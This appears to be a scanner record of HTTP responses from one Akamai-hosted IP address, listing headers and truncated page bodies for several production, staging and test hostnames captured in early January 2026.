HTTP/1.1 200 OK expect-ct: enforce, max-age=21600 referrer-policy: no-referrer-when-downgrade x-original-request-host: www.diyabet.com x-vhost: diyabet.com x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Content-Type: text/html;charset=utf-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31557600 X-Served-By: cache-fra-etou8220143-FRA X-Timer: S1767987453.352521,VS0,VS0,VE34 X-Akamai-Transformed: 9 20932 0 pmb=mRUM,3 Expires: Fri, 09 Jan 2026 19:37:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Jan 2026 19:37:33 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: affinity="63de863768baf6f2"; Path=/; HttpOnly; secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=50 Server-Timing: origin; dur=45 Akamai-Cache-Status: NotCacheable from child Server-Timing: ak_p; desc="1767987453267_389224196_2472083857_9438_1714_13_41_-";dur=1
Open service 23.50.131.142:443 · pages.connectforedge.net
2026-01-09 13:25
HTTP/1.1 200 OK
Cache-Control: no-cache,public, max-age=3600, s-maxage=3600
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/7.4.8
Link: <https://pages.connectforedge.net/wp-json/>; rel="https://api.w.org/"
Link: <https://pages.connectforedge.net/wp-json/wp/v2/pages/30>; rel="alternate"; type="application/json"
Link: <https://pages.connectforedge.net/>; rel=shortlink
Date: Fri, 09 Jan 2026 13:25:07 GMT
Content-Length: 34069
Connection: close
Set-Cookie: Country=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Page title: Axi – Trade your edge
<!DOCTYPE html>
<html lang="en-AU">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="https://gmpg.org/xfn/11">
<link media="all" href="https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_3d34c3feac69caae539ee4b5c9d09f84.css" rel="stylesheet"><title>Axi – Trade your edge</title>
<meta name='robots' content='noindex, nofollow' />
<script>
dataLayer = [{"title":"Home","author":"admin","wordcount":96,"logged_in":"false","page_id":30,"post_date":"2020-08-06 01:32:28","post_type":"page"}];
</script>
<!-- Anti-flicker snippet (recommended) -->
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
{'GTM-57CJ7NC':true});</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-57CJ7NC');</script>
<!-- End Google Tag Manager --><link rel="alternate" type="application/rss+xml" title="Axi » Feed" href="https://pages.connectforedge.net/feed/" />
<link rel="alternate" type="application/rss+xml" title="Axi » Comments Feed" href="https://pages.connectforedge.net/comments/feed/" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pages.connectforedge.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.9"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<link rel='stylesheet' id='elementor-post-95-css' href='https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_single_65d1424c7ef91c723172c1f8a2426213.css?ver=1750226879' media='all' />
<link rel='stylesh
Open service 23.50.131.142:443 · www-nonprod-exo.rubattel-weyermann.ch
2026-01-09 09:31
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 upgrade-insecure-requests: 1 x-xss-protection: 1; mode=block Link: <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/>; rel="https://api.w.org/", <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/wp/v2/pages/8>; rel="alternate"; title="JSON"; type="application/json", <https://www-nonprod-exo.rubattel-weyermann.ch/>; rel=shortlink x-panthera-cache-bypassed: 1 x-frame-options: SAMEORIGIN x-content-type-options: nosniff referrer-policy: same-origin X-Akamai-Transformed: 9 15474 0 pmb=mRUM,2 Expires: Fri, 09 Jan 2026 09:31:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Jan 2026 09:31:45 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: PANTHERASID=9173c689e412d28d; path=/; HttpOnly; Secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=244 Server-Timing: origin; dur=890 Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preload Server-Timing: ak_p; desc="1767951104041_389224206_778133332_113230_5998_94_97_-";dur=1
Open service 23.50.131.142:443 · www.algerie.stagingirb.bnpparibas
2026-01-09 07:28
HTTP/1.1 200 OK
Last-Modified: Wed, 06 Dec 2023 10:38:27 GMT
Content-Type: text/html
x-varnish-cache: HIT
Date: Fri, 09 Jan 2026 07:28:54 GMT
Content-Length: 10701
Connection: close
Strict-Transport-Security: max-age=15768000
Page title: Apache2 Debian Default Page: It works
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/openlogo-75.png" alt="Debian Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Debian Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a hr
Open service 23.50.131.142:443 · www.iso.fr
2026-01-09 03:36
HTTP/1.1 200 OK
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 2669
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Expires: Fri, 09 Jan 2026 03:36:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Jan 2026 03:36:09 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Alt-Svc: h3=":443"; ma=93600
Strict-Transport-Security: max-age=86400 ; includeSubDomains
Set-Cookie: ak_bmsc=312D9A25D9C083AB4402A9A40DDEB4A9~000000000000000000000000000000~YAAQDhczF5Veg5qbAQAAZmzToB7gmuw6JahihpQwbPeqwPWUoXumFGusT7Wb/B1EEbqWaOx6qogoWmgw+93Y0UpOW/NfGL7J6sr2wukjl9SjBD/HyMzB0OHfqVXoUgAVx+c/aOa+NJVT2Sefiw8wgAixpG9tSKV5wWBBnW00QQFm8aL488vHLOLxnMdNlfFYY/Q0jtaf7+xJ26b/wwH6hcongT3rFaPj3tkAvV2kXRSnvqKk8i1uohmoLJ3maknze571q72RUzSQXTdzlgMNa2/YRzqIs1EYL7hvV3Hzsb9Cg6mjIxTSEHhNA1Mx9hn/KOwc7n9o2E2d46rSjmKfxGDoEg3bW3adLHlVXiRZJ3C5AkW0fGPlcU/QNQuB6IsaAs+GGjyzNCukBzLsB9YcAaf1tO7Q; Domain=.www.iso.fr; Path=/; Expires=Fri, 09 Jan 2026 05:36:09 GMT; Max-Age=7200; HttpOnly
Server-Timing: ak_p; desc="1767929769057_389224206_761907994_11_4517_83_0_-";dur=1
Page title:
<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="refresh" content="5; URL='/?bm-verify=AAQAAAAM_____1FX2TD4pfuLiLZwyOPjTfFIR44lr4b0y2Jsy0iq0_3sLFWUsYB3VLllAgMQDUU05Jju1Ke1foPyhdFDbDA8xUHh95DCceWbm6KsdH_W211VuhS153oMS_O9cYLxTQ_AAnYbvmA4V5QRIjpgGdQYKWGigCxgPWwWTwPD-gu-syvhzYoRUuKCHc-FUB_7V8GLlLu7k6ulJ2n-qyUuncFB6AONJQv5eGYVKA15tA'" /><title> </title><script> var i = 1767929769; var j = i + Number("2926" + "93871"); </script> </head> <noscript> <iframe style="border: none; height: 100%; width: 100%;" src=""></iframe></noscript>
<body style="margin:0; height:100vh; display:flex; justify-content:center; align-items:flex-start;"> <div style="position:relative; top:33vh; text-align:center;"> <div> <p style="font-family:sans-serif; font-size:16px; margin-bottom:12px; color:#333;"> Powered and protected by </p> </div> <div> <img id="akam-logo" src="/_sec/akamai-logo.svg" alt="Powered by Akamai" loading="eager" style="width:200px; height:auto;" /> </div> <div class="akamai-privacy" ><a href="https://www.akamai.com/privacy" target="_blank">Privacy</a> </div> </div>
<script> function triggerInterstitialChallenge() {var xhr = new XMLHttpRequest(); xhr.withCredentials = true; xhr.addEventListener("loadend", function() { try { var data = JSON.parse(xhr.responseText); if (data.hasOwnProperty('reload')) { if (data["reload"] == true) { window.location.replace(window.location.href.replace(/[&?]bm-verify=[^#]*/, "")); if(window.location.hash){ window.location.reload(); } } } else if (data.hasOwnProperty('location')) { window.location.replace(data["location"]); } else { window.location.reload(); } } catch (e) { window.location.reload(); }}); xhr.open("POST", "/_sec/verify?provider=interstitial", false); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"bm-verify": "AAQAAAAM/////yk4GhBTXaLOlW+taECAVigzws/HNBOLyey7KzYukbpFY4K1RG+qXOKblqaEL+aP8hW94AqA9w6ms2rDyjtqkGGVfVixFCB8WBEfA5hVicA0yteI2kH4uozo79FK+CUXwk1lEjtQsfwCChCZx6TXxdPkOhRsiNe9seJfVQn3wjMwGAtQD/vkgq4c9ddP7ccQsGNoAD+x9DDffiMErUp1K3oTyTvSZow1+D1rzum5gPHs2Z5HjbWLjkvzcG8=", "pow": j}));} try {if (document.getElementById("akam-logo")) {document.getElementById("akam-logo").onload = function () {requestAnimationFrame(triggerInterstitialChallenge);}; document.getElementById("akam-logo").onerror = triggerInterstitialChallenge;} else {triggerInterstitialChallenge()}} catch(e) {triggerInterstitialChallenge();}</script> </body> </html>
Open service 23.50.131.142:443 · graph-b.staging.nu.nl
2026-01-09 03:19
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Fri, 09 Jan 2026 03:19:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Jan 2026 03:19:59 GMT Connection: close
Open service 23.50.131.142:443 · uat-backend-app.generalicentrallife.com
2026-01-08 22:53
HTTP/1.1 503 Service Unavailable Mime-Version: 1.0 Content-Type: text/html Content-Length: 280 Expires: Thu, 08 Jan 2026 22:53:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 08 Jan 2026 22:53:43 GMT Connection: close Server-Timing: edge; dur=836 Server-Timing: origin; dur=179 Server-Timing: cdn-cache; desc=MISS Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains Akamai-Cache-Status: NotCacheable from child Akamai-GRN: 0.1a173317.1767912822.aa1d7f8f Server-Timing: ak_p; desc="1767912822012_389224218_2854059919_101324_3924_13_49_-";dur=1 Page title: Error <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #30.1a173317.1767912822.aa1d7f8f <P>https://errors.edgesuite.net/30.1a173317.1767912822.aa1d7f8f</P> </BODY></HTML>
Open service 23.50.131.142:443 · shop-beta-api.gls-italy.com
2026-01-02 22:57
HTTP/1.1 302 Moved Temporarily Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 0 Location: /swagger X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0; mode=block X-Content-Type-Options: nosniff Expires: Fri, 02 Jan 2026 22:57:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 02 Jan 2026 22:57:44 GMT Connection: close Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=62 Server-Timing: origin; dur=5 Server-Timing: ak_p; desc="1767394664637_389224206_1136717320_6591_11576_80_110_-";dur=1
Open service 23.50.131.142:443 · graph-b.test.nu.nl
2026-01-02 21:20
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Fri, 02 Jan 2026 21:20:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 02 Jan 2026 21:20:46 GMT Connection: close
Open service 23.50.131.142:443 · pages.connectforedge.net
2026-01-02 19:42
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/7.4.8
Link: <https://pages.connectforedge.net/wp-json/>; rel="https://api.w.org/"
Link: <https://pages.connectforedge.net/wp-json/wp/v2/pages/30>; rel="alternate"; type="application/json"
Link: <https://pages.connectforedge.net/>; rel=shortlink
Content-Length: 34069
Date: Fri, 02 Jan 2026 19:42:26 GMT
Connection: close
Set-Cookie: Country=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Page title: Axi – Trade your edge
<!DOCTYPE html>
<html lang="en-AU">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="https://gmpg.org/xfn/11">
<link media="all" href="https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_5d0e66016b28df01d1fa4ab561e7086f.css" rel="stylesheet"><title>Axi – Trade your edge</title>
<meta name='robots' content='noindex, nofollow' />
<script>
dataLayer = [{"title":"Home","author":"admin","wordcount":96,"logged_in":"false","page_id":30,"post_date":"2020-08-06 01:32:28","post_type":"page"}];
</script>
<!-- Anti-flicker snippet (recommended) -->
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
{'GTM-57CJ7NC':true});</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-57CJ7NC');</script>
<!-- End Google Tag Manager --><link rel="alternate" type="application/rss+xml" title="Axi » Feed" href="https://pages.connectforedge.net/feed/" />
<link rel="alternate" type="application/rss+xml" title="Axi » Comments Feed" href="https://pages.connectforedge.net/comments/feed/" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pages.connectforedge.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.9"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<link rel='stylesheet' id='elementor-post-95-css' href='https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_single_65d1424c7ef91c723172c1f8a2426213.css?ver=1750226879' media='all' />
<link rel='stylesh
Open service 23.50.131.142:443 · www.diyabet.com
2026-01-02 18:40
HTTP/1.1 200 OK expect-ct: enforce, max-age=21600 referrer-policy: no-referrer-when-downgrade x-original-request-host: www.diyabet.com x-vhost: diyabet.com x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Content-Type: text/html;charset=utf-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31557600 X-Served-By: cache-fra-etou8220126-FRA X-Timer: S1767379228.138946,VS0,VS0,VE18 X-Akamai-Transformed: 9 20932 0 pmb=mRUM,3 Expires: Fri, 02 Jan 2026 18:40:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 02 Jan 2026 18:40:28 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: affinity="3c2a581f23e00c58"; Path=/; HttpOnly; secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=44 Server-Timing: origin; dur=19 Akamai-Cache-Status: NotCacheable from child Server-Timing: ak_p; desc="1767379227965_389224196_21156642_6276_1304_83_168_-";dur=1
Open service 23.50.131.142:443 · www.algerie.stagingirb.bnpparibas
2026-01-02 13:58
HTTP/1.1 200 OK
Last-Modified: Wed, 06 Dec 2023 10:38:27 GMT
Content-Type: text/html
x-varnish-cache: HIT
Date: Fri, 02 Jan 2026 13:58:33 GMT
Content-Length: 10701
Connection: close
Strict-Transport-Security: max-age=15768000
Page title: Apache2 Debian Default Page: It works
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/openlogo-75.png" alt="Debian Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Debian Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a hr
Open service 23.50.131.142:443 · www-nonprod-exo.rubattel-weyermann.ch
2026-01-02 12:10
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 upgrade-insecure-requests: 1 x-xss-protection: 1; mode=block Link: <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/>; rel="https://api.w.org/", <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/wp/v2/pages/8>; rel="alternate"; title="JSON"; type="application/json", <https://www-nonprod-exo.rubattel-weyermann.ch/>; rel=shortlink x-panthera-cache-bypassed: 1 x-frame-options: SAMEORIGIN x-content-type-options: nosniff referrer-policy: same-origin X-Akamai-Transformed: 9 15473 0 pmb=mRUM,2 Expires: Fri, 02 Jan 2026 12:10:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 02 Jan 2026 12:10:58 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: PANTHERASID=9173c689e412d28d; path=/; HttpOnly; Secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=403 Server-Timing: origin; dur=461 Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preload Server-Timing: ak_p; desc="1767355858013_389224206_964968550_86223_7111_99_102_-";dur=1
Open service 23.50.131.142:443 · graph-b.staging.nu.nl
2026-01-02 10:26
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Fri, 02 Jan 2026 10:26:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 02 Jan 2026 10:26:14 GMT Connection: close
Open service 23.50.131.142:443 · www.iso.fr
2026-01-02 07:07
HTTP/1.1 200 OK
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 2541
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Expires: Fri, 02 Jan 2026 07:07:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 02 Jan 2026 07:07:14 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Alt-Svc: h3=":443"; ma=93600
Strict-Transport-Security: max-age=86400 ; includeSubDomains
